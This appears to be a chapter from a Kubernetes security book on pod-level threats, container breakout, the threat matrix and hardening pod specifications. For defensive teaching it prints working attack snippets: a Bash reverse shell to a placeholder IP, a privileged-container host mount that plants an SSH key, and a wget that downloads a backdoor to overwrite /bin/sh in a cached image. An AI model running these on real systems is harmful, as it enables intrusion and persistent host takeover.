Chapter 2. Pod-level Resources

In this chapter, we’ll start with the atomic unit of Kubernetes deployment: a pod. Pods run apps, and an app may be a single container or many working together in one or more pods.

We consider what bad things can happen in and around a pod, and look at how you can mitigate the risk of getting attacked.

As with any sensible security effort, we’ll begin by defining a lightweight threat model for your system, identifying the threat actors it defends against, and highlighting the most dangerous threats. This gives you a solid basis to devise countermeasures and controls, and take defensive steps to protect your customer’s valuable data.

We’ll go deep into the trust model of a pod and look at what is trusted by default, where we can tighten security with configuration, and what an attacker’s journey looks like.

Anatomy of the attack

Captain Hashjack started their assault on your systems by enumerating BCTL’s DNS subdomains and S3 buckets. These could have offered an easy way into the organisation’s systems, but there was nothing easily exploitable on this occasion. Undeterred, they now create an account on the public website and log in, using a web application scanner like OWASP ZAP (Zed Attack Proxy) to pry into API calls and application code for unexpected responses. They are on the search for leaking web-server banner and version information (to learn which exploits might succeed) and are generally injecting and fuzzing APIs for poorly handled user input.

This is not the level of scrutiny that your poorly maintained codebase and systems are likely to withstand for long. Attackers may be searching for a needle in a haystack, but the safest haystack has no needles at all.

Caution

Any computer should be resistant to this type of indiscriminate attack: a Kubernetes system should achieve “minimum viable security” through the capability to protect itself from casual attack with up-to-date software and hardened configuration. Kubernetes encourages regularly updates by supporting the last three minor releases (e.g. 1.24, 1.23, and 1.22), which are released every 4 months and ensure a year of patch support. Older versions are unsupported and likely to be vulnerable.

Although many parts of an attack can be automated, this is an involved process. A casual attacker is more likely to scan widely for software paths that trigger published CVEs and run automated tools and scripts against large ranges of IPs (such as the ranges advertised by public cloud providers). These are noisy approaches.

Remote code execution

If a vulnerability in your application can be used to run untrusted (and in this case, external) code, it is called an RCE (remote code execution). An adversary can use an RCE to spawn a remote control session into the application’s environment: here it is the container handling the network request, but if the RCE manages to pass untrusted input deeper into the system, it may exploit a different process, pod, or cluster.

Your first goal of Kubernetes and pod security should be to prevent remote code execution (RCE), which could be as simple as a kubectl exec, or as complex as a reverse shell, such as the one demonstrated in Figure 2-1:

image 2021 05 29 17 00 50 372
Figure 2-1. Reverse shell into a Kubernetes pod

Application code changes frequently and may hide undiscovered bugs, so robust AppSec practices (including IDE and CI/CD integration of tooling and dedicated security requirements as task acceptance criteria) are essential to keep an attacker from compromising the processes running in a pod.

Note

The Java framework Struts was one of the most widely deployed libraries to suffer a remotely exploitable vulnerability (CVE-2017-5638), which contributed to the breach of Equifax customer data. To fix a supply chain vulnerability like this in a container, it is quickly rebuilt in CI with a patched library, and redeployed, reducing the risk window of vulnerable libraries being exposed to the internet. We examine other ways to get remote code execution throughout the book.

With that, let’s move on to the network aspects.

Network attack aurface

The greatest attack surface, see also of a Kubernetes cluster is its network interfaces and public-facing pods, and network-facing services such as web servers are first line of defence in keeping your clusters secure, a topic we will dive into in Chapter 5.

This is because unknown users coming in from across the network scan network-facing applications for the exploitable signs of RCE. They can use automated network scanners to attempt to exploit known vulnerabilities and input-handling errors in network-facing code. If a process or system can be forced to run in an unexpected way, there is the possibility that it can be compromised through these untested logic paths.

To investigate how an attacker may establish a foothold in a remote system using only the humble, all-powerful Bash shell, see for example Chapter 16 of Cybersecurity Ops with bash.

To defend against this, we must scan containers for operating system and application CVEs in the hope of updating them before they are exploited.

If Captain Hashjack has an RCE into a pod, it’s a foothold to attack your system more deeply from the pod’s network position. You should strive to limit what an attacker can do from this position, and customise your security configuration to a workload’s sensitivity. If your controls are too loose, this may be the beginning of an organisation-wide breach for your employer, BCTL.

Tip

For an example of spawning a shell via Struts with Metasploit, see Sam Bowne’s guide.

As Captain Hashjack has just discovered, we have also been running a vulnerable version of the Struts library. This offers an opportunity to start attacking the cluster from within.

Warning

A simple Bash reverse shell like this one is a good reason to remove Bash from your containers. It uses Bash’s virtual /dev/tcp/ filesystem, and is not exploitable in sh which doesn’t include this oft-abused feature:

revshell() {
    local DEFAULT_IP="${1:-123.123.123.123}";
    local DEFAULT_PORT="${2:-1234}";
    while :; do
        nohup bash -i &> /dev/tcp/${DEFAULT_IP}/${DEFAULT_PORT} 0>&1;
        sleep 1;
    done
}

As the attack begins, let’s take a look at where the pirates have landed: inside a Kubernetes pod.

Kubernetes workloads: apps in a pod

Multiple cooperating containers can be logically grouped into a single pod, and every container Kubernetes runs must run inside a pod. Sometimes a pod is called a “workload”, which is one of many copies of the same execution environment. Each pod must run on a Node in your Kubernetes cluster as shown in Figure 2-2.

Cluster deployment example
Figure 2-2. Cluster deployment example (source)

A pod is a single instance of your application, and to scale to demand, many identical pods are used to replicate the application by a workload resource such as a Deployment, DaemonSet, or StatefulSet.

Your pods may include sidecar containers supporting monitoring, network, and security and “init” containers for pod bootstrap, enabling you to deploy different application styles. These sidecars are likely to have elevated privileges and be of interest to an adversary.

“Init” containers run in order (first to last) to set up a pod and can make security changes to the namespaces, like Istio’s init container configuring the pod’s iptables (in the kernel’s netfilter) so the runtime pods route traffic through a sidecar container. Sidecars run alongside the primary container in the pod, and all non-init containers in a pod start at the same time.

Tip

Kubernetes is a distributed system, and ordering of actions (like applying a multi-doc YAML file) is eventually consistent, meaning that API calls don’t always complete in the order that you expect. Ordering depends on various factors and shouldn’t be relied upon: as Tabitha Sable likes to say, Kubernetes is “a friendly robot that uses control theory to make our hopes and dreams manifest… so long as your hopes and dreams can be expressed in YAML”.

What’s inside a pod? Cloud native applications are often microservices, web servers, workers and batch processes. Some pods run one-shot tasks (wrapped with a job, or maybe one single non-restarting container), perhaps running multiple other pods to assist. All these pods present an opportunity to an attacker. Pods get hacked. Or, more often, a network-facing container process gets hacked.

A pod is a trust boundary encompassing all the containers inside, including their identity and access. There is still separation between pods that you can enhance with policy configuration, but you should consider the entire contents of a pod when threat modelling it.

What’s a pod?

A pod is a Kubernetes invention: an environment for multiple containers to run inside. It is the smallest deployable unit you can ask Kubernetes to run. A pod has its own IP address, can mount in storage, and its namespaces surround the containers created by the container runtime (e.g. containerd, CRI-O).

A container is a mini-Linux, its processes containerised with control groups (cgroups) to limit resource usage and namespaces to limit access. A variety of other controls can be applied to restrict a containerised process’s behaviour, as we’ll see in this chapter.

Example pods
Figure 2-3. Example pods (source)

The lifecycle of a pod is controlled by the kubelet, the Kubernetes API server’s deputy, deployed on each node in the cluster to manage and run containers. If the kubelet loses contact with the API server, it will continue to manage its workloads, restarting them if necessary. If the kubelet crashes, the container manager will also keep containers running in case they crash. The Kubelet and container manager oversee your workloads.

The kubelet runs pods on worker nodes by instructing the container runtime and configuring network and storage. Each container in a pod is a collection of Linux namespaces, cgroups, capabilities, and Linux Security Modules (LSMs). As the container runtime builds a container, each namespace is created and configured individually before being combined into a container.

Tip

Capabilities are individual switches for “special” root user operations such as changing any file’s permissions, loading modules into the kernel, accessing devices in raw mode (e.g. networks and IO), BPF and performance monitoring, and every other operation.

The root user has all capabilities, and capabilities can be granted to any process or user (“ambient capabilities”). Excess capability grants may lead to container breakout, as we see later in this chapter.

In Kubernetes, a newly-created container is added to the pod by the container runtime, where it shares network and interprocess communication namespaces between pod containers.

Figure 2-4 shows a Kubelet running four individual pods on a single node.

Example pods on a node
Figure 2-4. “Example pods on a node” (source)

The container is the first line of defence against an adversary, and container images should be scanned for CVEs before being run. This simple step reduces the risk of running an outdated or malicious container and informs your risk-based deployment decisions: do you ship to production, or is there an exploitable CVE that needs patching first?

Tip
 "Official" container images in public registries have a greater likelihood of being up to date and well-patched, and
Docker Hub signs all official images with Notary as we'll see in <<ch-apps-supply-chain>>.

Public container registries often host malicious images, so detecting them before production is essential. Figure 2-5 shows how this might happen.

Poisoning a public container registry
Figure 2-5. Poisoning a public container registry

The kubelet attaches pods to a container network interface (CNI). CNI network traffic is treated as layer 4 TCP/IP although the underlying network technology used by the CNI plugin may differ.

Warning

Although starting a malicious container under a correctly configured container runtime is usually safe, there have been attacks against the container bootstrap phase. We examine the /proc/self/exe breakout CVE-2019-5736 later in this chapter.

The Kubelet attaches pods to a container network interface (CNI). CNI network traffic is treated as layer 4 TCP/IP (although the underlying network technology used by the CNI plugin may differ), and encryption is the job of the CNI plugin, the application, a service mesh, or at a minimum, the underlay networking between the nodes. If traffic is unencrypted, it may be sniffed by a compromised pod or node.

Pods can also have storage attached by Kubernetes, using the CSI (Container Storage Interface), which includes the PersistentVolumeClaim and StorageClass seen in Figure 2-6. In Chapter 6 we will get deeper into the storage aspects.

Cluster Example 2
Figure 2-6. Cluster example 2 (source)
Warning

Vulnerabilities have been found in many storage drivers, including CVE-2018-11235, which exposed a Git attack on the gitrepo storage volume, and CVE-2017-1002101, a subpath volume mount mishandling error. We will cover these in Chapter 6.

In Figure 2-6 you can see a view of the control plane and the API server’s central role in the cluster. The API Server is responsible for interacting with the cluster data store (etcd), hosting the cluster’s extensible API surface, and managing the Kubelets. If the API server or etcd instance is compromised, the attacker has complete control of the cluster: these are the most sensitive parts of the system.

For performance in larger clusters, the control plane should run on separate infrastructure to etcd, which requires high disk and network I/O to support reasonable response times for its distributed consensus algorithm, Raft.

As the API server is the etcd cluster’s only client, compromise of either effectively roots the cluster: due to Kubernetes’ asyncronous scheduling the injection of malicious, unscheduled pods into etcd will trigger their scheduling to a Kubelet.

As with all fast-moving software, there have been vulnerabilities in most parts of Kubernetes’ stack. The only solution to running modern software is a healthy continuous integration infrastructure capable of promptly redeploying vulnerable clusters upon a vulnerability announcement.

Understanding containers

Okay, so we have a high-level view of a cluster. But at a low level, what is a “container”? It is a microcosm of Linux that gives a process the illusion of a dedicated kernel, network, and userspace. Software trickery fools the process inside your container into believing it is the only process running on the host machine. This is useful for isolation and migration of your existing workloads into Kubernetes.

Note

As Christian Brauner and Stephane Graber like to say “(Linux) containers are a userspace fiction”, a collection of configurations that present an illusion of isolation to a process inside. Containers emerged from the primordial kernel soup, a child of evolution rather than intelligent design that has been morphed, refined, and coerced into shape so that we now have something usable.

Containers don’t exist as a single API, library, or kernel feature. They are merely the resultant bundling and isolation that’s left over once the kernel has started a collection of namespaces, configured some cgroups and capabilities, added Linux Security Modules like AppArmor and SELinux, and started our precious little process inside.

A container is a process in a special environment with some combination of namespaces either enabled or shared with the host (or other containers). The process comes from a container image, a TAR file containing the container’s root filesystem, its application(s), and any dependencies. When the image is unpacked into a directory on the host and a special filesystem “pivot root” is created, a “container” is constructed around it, and its ENTRYPOINT is run from the filesystem within the container. This is roughly how a container starts, and each container in a pod must go through this process.

Container security has two parts: the contents of the container image, and its runtime configuration and security context. An abstract risk rating of a container can be derived from the number of security primitives it enables and uses safely (avoiding host namespaces, limiting resource use with cgroups, dropping unneeded capabilities, tightening security module configuration for the process’s usage pattern, and minimising process and filesystem ownership and contents). Kubesec.io rates a pod configuration’s security on how well it enables these features at runtime.

When the kernel detects a network namespace is empty, it will destroy the namespace, removing any IPs allocated to network adapters in it. For a pod with only a single container to hold the network namespace’s IP allocation, a crashed and restarting container would have a new network namespace created and so have a new IP assigned. This rapid churn of IPs would create unnecessary noise for your operators and security monitoring, and so Kubernetes uses the almighty pause container to hold the pod’s shared network namespace open in the event of a crash-looping tenant container. This container is invisible via the Kubernetes API but visible to the container runtime on the host:

andy@k8s-node-x:~ [0]$ docker ps --format '{{.ID}} {{.Image}} {{.Names}}' | grep sublimino-
92bfb60ce6f1 busybox k8s_alpine_sublimino-frontend-5cc74f44b8-4z86v_default_845db3d9-780d-49e5-bcdf-bc91b2cf9cbe_0
21d86e7b4faf k8s.gcr.io/pause:3.1 k8s_POD_sublimino-frontend-5cc74f44b8-4z86v_default_845db3d9-780d-49e5-bcdf-bc91b2cf9cbe_1
...
adcddc431673 busybox k8s_alpine_sublimino-microservice-755d97b46b-xqrw9_default_1eaeaf4c-3a22-4fc9-a154-036e5381338b_0
1a9dcc794b23 k8s.gcr.io/pause:3.1 k8s_POD_sublimino-microservice-755d97b46b-xqrw9_default_1eaeaf4c-3a22-4fc9-a154-036e5381338b_1
...
fa6ac946cf38 busybox k8s_alpine_sublimino-frontend-5cc74f44b8-hnxz5_default_9ba3a8c2-509d-41e0-8771-f38bec5216eb_0
6dbd4f68c9f2 k8s.gcr.io/pause:3.1 k8s_POD_sublimino-frontend-5cc74f44b8-hnxz5_default_9ba3a8c2-509d-41e0-8771-f38bec5216eb_1

Sharing network and storage

A group of containers in a pod share a network namespace, so all your container’s ports are available on the same network adapter to any container in the pod. This gives an attacker in one container of the pod a chance to attack private sockets available on any network interface, including the loopback adapter 127.0.0.1.

Tip

We examine these concepts in greater detail in Chapters 5 and 6.

Each container runs in a root filesystem from its container image that is not shared between containers. Volumes must be mounted into each container in the pod configuration, but a pod’s volumes may be available to all containers if configured that way, as Figure 2-3 shows.

Here we see Figure 2-7 with some of the paths inside a container workload that an attacker may be interested in (note the user and time namespaces are not currently in use):

Nested Pod Namespaces
Figure 2-7. Namespaces wrapping the containers in a pod (inspiration)
Note

User namespaces are the ultimate kernel security frontier, and are generally not enabled due to historically being likely entry points for kernel attacks: everything in Linux is a file, and user namespace implementation cuts across the whole kernel, making it more difficult to secure than other namespaces.

The special virtual filesystems listed here are all possible paths of breakout if misconfigured and accessible inside the container: /dev may give access to the host’s devices, /proc can leak process information, or /sys supports functionality like launching new containers.

What’s the worst that could happen?

A Chief Information Security Officer (CISO) is responsible for the organisation’s security. Your role as a CISO means you should consider worst case scenarios, to ensure that you have appropriate defences and mitigations in place. Attack trees help to model these negative outcomes, and one of the data sources you can use is the Threat Matrix as shown in Figure 2-8.

Microsoft Kubernetes Threat Matrix
Figure 2-8. Microsoft Kubernetes Threat Matrix

But there are some threats missing, and the community has added some (thanks to Alcide, and Brad Geesaman and Ian Coldwater again), as shown in Figure 2-9:

Extended Kubernetes Threat Matrix
Figure 2-9. Extended Kubernetes Threat Matrix (Grey: Alcide, Red: ControlPlane, sig-honk, and friends)
Initial Access (Popping a shell pt 1 - prep) Execution (Popping a shell pt 2 - exec) Persistence (Keeping the shell) Privilege Escalation (Container breakout) Defense Evasion (Assuming no IDS) Credential Access (Juicy creds) Discovery (Enumerate possible pivots) Lateral Movement (Pivot) Command & Control (C2 methods) Impact (Dangers)

Using Cloud Credentials - service account keys, impersonation

Exec Into Container (bypass admission control policy)

Backdoor Container (add a reverse shell to local or container registry image)

Privileged container (legitimate escalation to host)

Clear Container Logs (covering tracks after host breakout)

List K8s Secrets

List K8s API Server (nmap, curl)

Access Cloud Resources (workload identity and cloud integrations)

Dynamic Resolution (DNS tunnelling)

Data Destruction (datastores, files, NAS, ransomware…)

Compromised Images In Registry (supply chain unpatched or malicious)

BASH/CMD Inside Container (Implant or trojan, RCE/reverse shell, malware, C2, DNS tunnelling)

Writable Host Path Mount (host mount breakout)

Cluster Admin Role Binding (untested RBAC)

Delete K8s Events (covering tracks after host breakout)

Mount Service Principal (Azure specific)

Access Kubelet API

Container Service Account (API server)

App Protocols (L7 protocols, TLS, …)

Resource Hijacking (cryptojacking, malware c2/distribution, open relays, botnet membership)

Application Vulnerability (supply chain unpatched or malicious)

Start New Container (with malicious payload: persistence, enumeration, observation, escalation)

K8s CronJob (reverse shell on a timer)

Access Cloud Resources (metadata attack via workload identity)

Connect From Proxy Server (to cover source IP, external to cluster)

Applications Credentials In Config Files (key material)

Access K8s Dashboard (UI requires service account credentials)

Cluster Internal Networking (attack neighbouring pods or systems)

Botnet (k3d, or traditional)

Application DoS

KubeConfig File (exfiltrated, or uploaded to the wrong place)

Application Exploit (RCE)

Static Pods (reverse shell, shadow API server to read audit-log-only headers)

Pod hostPath Mount (logs to container breakout)

Pod/Container Name Similarity (visual evasion, cronjob attack)

Access Container Service Account (RBAC lateral jumps)

Network Mapping (nmap, curl)

Access Container Service Account (RBAC lateral jumps)

Node Scheduling DoS

Compromise User Endpoint (2FA and federating auth mitigate)

SSH Server Inside Container (bad practice)

Injected Sidecar Containers (malicious mutating webhook)

Node To Cluster Escalation (stolen credentials, node label rebinding attack)

Dynamic Resolution (DNS) (DNS tunnelling/exfiltration)

Compromise Admission Controllers

Instance Metadata API (workload identity)

Host Writable Volume Mounts

Service Discovery DoS

K8s API Server Vulnerability (needs CVE and unpatched API server)

Container Life Cycle Hooks (postStart and preStop events in pod yaml)

Rewrite Container Life Cycle Hooks (postStart and preStop events in pod yaml)

Control Plane To Cloud Escalation (keys in secrets, cloud or control plane credentials)

Shadow admission control or API server

Compromise K8s Operator (sensitive RBAC)

Access K8s Dashboard

PII or IP exfiltration (cluster or cloud datastores, local accounts)

Compromised host (credentials leak/stuffing, unpatched services, supply chain compromise)

Rewrite Liveness Probes (exec into and reverse shell in container)

Compromise Admission Controller (reconfigure and bypass to allow blocked image with flag)

Access Host File System (host mounts)

Access Tiller Endpoint (Helm v3 negates this)

Container pull rate limit DoS (container registry)

Compromised etcd (missing auth)

Shadow admission control or API server (privileged RBAC, reverse shell)

Compromise K8s Operator (compromise flux and read any secrets)

Access K8s Operator

SOC/SIEM DoS (event/audit/log rate limit)

K3d botnet (secondary cluster running on compromised nodes)

Container breakout (kernel or runtime vulnerability e.g. Dirtycow, /proc/self/exe, eBPF verifier bugs, Netfilter)

We’ll explore these threats in detail as we progress through the book. But the first threat, and the greatest risk to the isolation model of our systems, is an attacker breaking out of the container itself.

Container breakout

A cluster admin’s worst fear is a container breakout, that is, a user or process inside a container that can run code outside of the container’s execution environment.

Speaking strictly, a container breakout should exploit the kernel, attacking the code a container is supposed to be constrained by. In the authors’ opinion any avoidance of isolation mechanisms breaks the contract the container’s maintainer or operator thought they had with the process(es) inside. This means it should be considered equally threatening to the security of the host system and its data, so we define container breakout to include any evasion of isolation.

Container breakouts may occur in various ways:

  • an “exploit” including against the kernel, network or storage stack, or container runtime

  • a “pivot” such as attacking exposed local, cloud, or network services, or escalating privilege and abusing discovered or inherited credentials

  • or most likely just a misconfiguration that allows an attacker an easier or legitimate path to exploit or pivot

If the running process is owned by an unprivileged user (that is, one with no root capabilities), many breakouts are not possible. In that case the process or user must gain capabilities with a local privilege escalation inside the container before attempting to break out.

Once this is acheived, a breakout may start with a hostile root-owned process running in a poorly-configured container. Access to the root user’s capabilities within a container is the precursor to most escapes: without root (and sometimes CAP_SYS_ADMIN), many breakouts are nullified.

Tip

The securityContext and LSM configurations are vital to constrain unexpected activity from zero day vulnerabilities, or supply chain attacks (library code loaded into the container and exploited automatically at runtime).

You can define the active user, group, and filesytem group (set on mounted volumes to ensure readability, gated by fsGroupChangePolicy) in your workloads’ security contexts, and enforce it with admission control (see Chapter 8), as this example from the docs shows:

apiVersion: v1
kind: Pod
metadata:
  name: security-context-demo
spec:
  securityContext:
    runAsUser: 1000
    runAsGroup: 3000
    fsGroup: 2000
  containers:
  - name: sec-ctx-demo
# ...
    securityContext:
      allowPrivilegeEscalation: false
# ...

In a container breakout scenario, if the user is root inside the container and has mount capabilities (granted by default under CAP_SYS_ADMIN, which root has unless dropped), they can interact with virtual and physical disks mounted into the container. If the container is privileged (which amongst other things disables masking of kernel paths in /dev), it can see and mount the host filesystem.

# inside a privileged container
root@hack-aee24088:~ [0]$ ls -lasp /dev/
root@hack-aee24088:~ [0]$ mount /dev/xvda1 /mnt/

# write into host filesystem's /root/.ssh/ folder
root@hack-aee24088:~ [0]$ cat MY_PUB_KEY >> /mnt/root/.ssh/authorized_keys

We look at nsenter privileged container breakouts which escape more elegantly by entering the host’s namespaces in Chapter 6.

While you should prevent this attack easily by avoiding the root user and privilege mode, and enforcing that with admission control, it’s an indication of just how slim the container security boundary can be if misconfigured.

Warning

An attacker controlling a containerised process may have control of the networking, some or all of the storage, and potentially other containers in the pod. Containers generally assume other containers in the pod are friendly as they share resources, and we can consider the pod as a trust boundary for the processes inside. Init containers are an exception: they complete and shut down before the main containers in the pod start, and as they operate in isolation may have more security sensitivity.

The container and pod isolation model relies on the Linux kernel and container runtime, both of which are generally robust when not misconfigured. Container breakout occurs more often through insecure configuration than kernel exploit, although zero-day kernel vulnerabilities are inevitably devastating to Linux systems without correctly configured LSMs (Linux Security Modules, such as SELinux and AppArmor).

Note

In “Architecting Containerised Applications for Resilience” we explore how the Linux Dirtycow vulnerability could break out of insecurely configured containers. One of the authors live demoed fixing the breakout with AppArmor.

Container escape is rarely plain sailing, and any fresh vulnerabilities are often patched shortly after disclosure. Only occasionally does a kernel vulnerability result in an exploitable container breakout, and the opportunity to harden individually containerised processes with LSMs enables defenders to tightly constrain high-risk network-facing processes; it may entail one or more of:

  • finding a zero-day in the runtime or kernel

  • exploiting excess privilege and escaping using legitimate commands

  • evading misconfigured kernel security mechanisms

  • introspection of other processes or filesystems for alternate escape routes

  • sniffing network traffic for credentials

  • attacking the underlying orchestrator or cloud environment

Vulnerabilities in the underlying physical hardware often can’t be defended against in a container. For example, Spectre and Meltdown, CPU speculative execution attacks, and rowhammer, TRRespass, and SPOILER (DRAM memory attacks) bypass container isolation mechanisms as they cannot intercept the entire instruction stream that a CPU processes. Hypervisors suffer the same lack of possible protection.

Finding new kernel attacks is hard. Misconfigured security settings, exploiting published CVEs, and social engineering attacks are easier. But it’s important to understand the range of potential threats in order to decide your own risk tolerance.

We’ll go through a step-by-step security feature exploration to see a range of ways in which your systems may be attacked in the Appendix.

For more information on how the Kubernetes project manages CVEs, see Exploring container security: Vulnerability management in open-source Kubernetes.

Pod configuration and threats

We’ve spoken generally about various parts of a pod, so let’s finish off by going into depth on a pod spec to call out any gotchas or potential footguns.

Warning

In order to secure a pod or container, the container runtime should be minimally viably secure, that is: not hosting sockets to unauthenticated connections (e.g. /var/run/docker.sock and tcp://127.0.0.1:2375) as it leads to host takeover.

For the purpose of this example, we are using a frontend pod from the GoogleCloudPlatform/microservices-demo application, and it was deployed with kubectl create -f https://raw.githubusercontent.com/GoogleCloudPlatform/microservices-demo/master/release/kubernetes-manifests.yaml.

We have updated and added some extra configuration where relevant for demonstration purposes.

Pod header

The standard header we know and love, defining the type of entity this YAML defines, and its version:

apiVersion: v1
kind: Pod

Metadata and annotations may contain sensitive information like IPs security hints (in this case, for Istio), although this is only useful if the attacker has read-only access:

metadata:
  annotations:
    seccomp.security.alpha.kubernetes.io/pod: runtime/default
    cni.projectcalico.org/podIP: 192.168.155.130/32
    cni.projectcalico.org/podIPs: 192.168.155.130/32
    sidecar.istio.io/rewriteAppHTTPProbers: "true"

It also historically holds the seccomp, AppArmor, and SELinux policies:

metadata:
  annotations:
    container.apparmor.security.beta.kubernetes.io/hello: localhost/k8s-apparmor-example-deny-write

We look at how to use these annotation with in the runtime policies section.

Note

After many years in purgatorial limbo, seccomp in Kubernetes progressed to General Availability in v1.19

This changes the syntax from an annotation to a securityContext entry:

securityContext:
  seccompProfile:
    type: Localhost
    localhostProfile: my-seccomp-profile.json

The Kubernetes Security Profiles Operator (SPO) can install seccomp profiles on your nodes (a prerequisite to their use by the container runtime), and record new profiles from workloads in the cluster with oci-seccomp-bpf-hook.

The SPO also supports SELinux via selinuxd, with plenty of details in this blog post.

AppArmor is still in beta but annotations will be replaced with first-class fields like seccomp once it graduates to GA.

Let’s move on to a part of the pod spec that is not write-able by the client but contains some important hints.

Reverse uptime

When you dump a pod sepc from the API server (using for example kubectl get -o yaml) it includes the pod’s start time:

  creationTimestamp: "2021-05-29T11:20:53Z"

Pods running for longer than a week or two are likely to be at higher risk of bugs. Sensitive workloads running for more than 30 days will be safer if they’re rebuilt in CI/CD to account for library or operating system patches.

Pipeline scanning the existing container image offline for CVEs can be used to inform rebuilds. The safest approach is to combine both: “repave” (that is, rebuild and redeploy containers) regularly, and rebuild through the CI/CD pipelines whenever a CVE is detected.

Labels

Labels in Kubernetes are not validated or strongly typed: they are metadata. Labels are targeted by things like services and controllers using selectors for referencing, and are also used for security features such as Network Policy.

  labels:
    app: frontend
    type: redish

Typos in labels mean they do not match the intended selectors, and so can inadvertently introduce security issuess such as:

  • exclusions from expected network policy or admission control policy

  • unexpected routing from service target selectors

  • “rogue” pods that are not accurately targeted by operators or observability tooling

Managed fields

Managed fields was introduced in v1.18 and supports server-side apply. They duplicate information from elsewhere in the pod spec are of limited interest to us as we can read the entire spec from the API server. They look like this:

  managedFields:
  - apiVersion: v1
    fieldsType: FieldsV1
    fieldsV1:
      f:metadata:
        f:annotations:
          .: {}
          f:sidecar.istio.io/rewriteAppHTTPProbers: {}
# ...
      f:spec:
        f:containers:
          k:{"name":"server"}:
# ...
            f:image: {}
            f:imagePullPolicy: {}
            f:livenessProbe:
# ...

Pod namespace and owner

We know the pods’s name and namespace from the API request we made to retrieve it.

If we used --all-namespaces to return all pod configurations, this shows us the namespace:

  name: frontend-6b887d8db5-xhkmw
  namespace: default

From within a pod it’s possible to infer the current namespace from the DNS resolver configuration in /etc/resolv.conf (which is secret-namespace in this example):

$ grep -o "search [^ ]*" /etc/resolv.conf
search secret-namespace.svc.cluster.local

Other less-robust options include the mounted service account (assuming it’s in the same namespace, which it may not be), or the cluster’s DNS resolver (if you can enumerate or scrape it).

Environment variables

Now we’re getting into interesting configuration. We want to see the environment variables in a pod, partially because they may leak secret information (which should have been mounted as a file), and also because they may list which other services are available in the namespace and so suggest other network routes and applications to attack:

Warning

As you can see, passwords set in deployment and pod YAML is visible to the operator that deploys the YAML, the process at runtime and any other processes that can read its environment, and to anybody that can read from the Kubernetes or Kubelet APIs.

Here we see the container’s PORT (which is good practice and required by applications running in Knative and some other systems), the DNS names and ports of its coordinating services, some badly-set database config and credentials, and finally a sensibly-referenced secret file.

spec:
  containers:
  - env:
    - name: PORT
      value: "8080"
    - name: CURRENCY_SERVICE_ADDR
      value: currencyservice:7000
    - name: SHIPPING_SERVICE_ADDR
      value: shippingservice:50051
# These environment variables should be set in secrets
    - name: DATABASE_ADDR
      value: postgres:5432
    - name: DATABASE_USER
      value: secret_user_name
    - name: DATABASE_PASSWORD
      value: the_secret_password
    - name: DATABASE_NAME
      value: users
# This is a safer way to reference secrets and configuration
    - name: MY_SECRET_FILE
      value: /mnt/secrets/foo.toml

That wasn’t too bad, right? Let’s move on to container images.

Container images

The container image’s filesystem is of paramount importance to an attacker, as it may hold vulnerabilities that assist in privilege escalation. If you’re not patching regularly Captain Hashjack might get the same image from a public registry to scan it for vulnerabilities they may be able to exploit. Knowing what binaries and files are available also enables attack planning “offline”, so adversaries can be more stealthy and targeted when attacking the live system.

Tip

The OCI registry specification allows arbitrary image layer storage: it’s a two-step process and the first step uploads the manifest, with the second uploading the blob. If an attacker only performs the second step an attacker gains free arbitrary blob storage.

Most registries don’t index this automatically (with Harbour being the exception), and so they will store the “orphaned” layers forever, potentially hidden from view until manually garbage collected.

Here we see an image referenced by label, which means we can’t tell what the actual SHA256 hash digest of the container image is. The container tag could have been updated since this deployment as it’s not referenced by digest.

  image: gcr.io/google-samples/microservices-demo/frontend:v0.2.3

Instead of using image tags, we can use the SHA256 image digests to pull the image by its content address:

  image: docker run -it gcr.io/google-samples/microservices-demo/frontend@sha256:ca5c0f0771c89ec9dbfcbb4bfbbd9a048c25f7a625d97781920b35db6cecc19c

Images should always be referenced by SHA256, or use signed tags, otherwise it’s impossible to know what’s running as the label may have been updated in the registry since the container start. You can validate what’s being run by inspecting the running container for its image’s SHA256.

It’s possible to specifiy both a tag and an SHA256 digest in a Kubernetes image: key, in which case the tag is ignored and the image is retrieved by digest. This leads to potentially confusing image definitions such as controlplane/bizcard:latest@sha256:649f3a84b95ee84c86d70d50f42c6d43ce98099c927f49542c1eb85093953875 being retrieved as the image matching the SHA rather than the tag.

If an attacker can influence the local Kubelet image cache, they can add malicious code to an image and re-label it on the host node:

# load a malicious Bash/sh backdoor and overwrite the container's default CMD (/bin/sh)
$ docker run -it --cidfile=cidfile --entrypoint /bin/busybox 
    gcr.io/google-samples/microservices-demo/frontend:v0.2.3 
    wget https://securi.fyi/b4shd00r -O /bin/sh

# commit the changed container using the same
$ docker commit $(<cidfile) gcr.io/google-samples/microservices-demo/frontend:v0.2.3

# to run this again, don't forget to remove the cidfile

While the compromise of a local registry cache may lead to this attack, container cache access probably comes by rooting the node, and so this may be the least of your worries.

Note

The image pull policy of Always has a performance drawback in a highly dynamic, “autoscaling from zero” environments such as Knative. When startup times are crucial, a potentially multi-second imagePullPolicy latency is unacceptable and image digests must be used.

This attack on a local image cache can be mitigated with an image pull policy of Always, that will ensure the local tag matches what’s defined in the registry it’s pulled from. This is important and you should always be mindful of this setting:

    imagePullPolicy: Always

Typos in container image names, or registry names, will deploy unexpected code if an adversary has “typosquatted” the image with a malicious container.

This can be difficult to detect, for example, controlplan/hack instead of controlplane/hack. Tools like Notary protect against this by checking for valid signatures from trusted parties. If a TLS-intercepting middleware box intercepts and rewrites an image tag, a spoofed image may be deployed. Again, TUF and Notary side-channel signing mitigates against this, as do other container signing approaches like cosign, as discussed in Chapter 4.

Pod probes

Your liveness probes should be tuned to your application’s performance characteristics, and used to keep them alive in the stormy waters of your production environment. Probes inform Kubernetes if the application is incapable of fulfilling its specified purpose, perhaps through a crash or external system failure.

The Kubernetes audit finding TOB-K8S-024 shows probes can be subverted by an attacker with the ability to schedule pods: without changing the pod’s command or args they have the power to make network requests and execute commands within the target container. This yields local network discovery to an attacker as the probes are executes by the Kubelet on the host networking interface, and not from within the pod.

A host header can be used here to enumerate the local network. Their proof of concept exploit:

apiVersion : v1
kind : Pod
# ...
livenessProbe:
  httpGet:
    host: 172.31.6.71
    path: /
    port: 8000
    httpHeaders :
    - name: Custom-Header
      value: Awesome

CPU and memory limits and requests

Resource limits and requests which manage the pod’s cgroups prevent the exhaustion of finite memory and compute resources on the Kubelet host, and defend from fork bombs and runaway processes. Networking bandwidth limits are not supported in the pod spec, but may be supported by your CNI implementation.

cgroups are a useful resource constraint. cgroups v2 offers more protection, but cgroups v1 are not a security boundary and they can be escaped easily.

Limits restrict the potential cryptomining or resource exhaustion that a malicious container can execute. It also stops the host becoming overwhelmed by bad deployments. It has limited effectiveness against an adversary looking to further exploit the system unless they need to use a memory-hungry attack.

    resources:
      limits:
        cpu: 200m
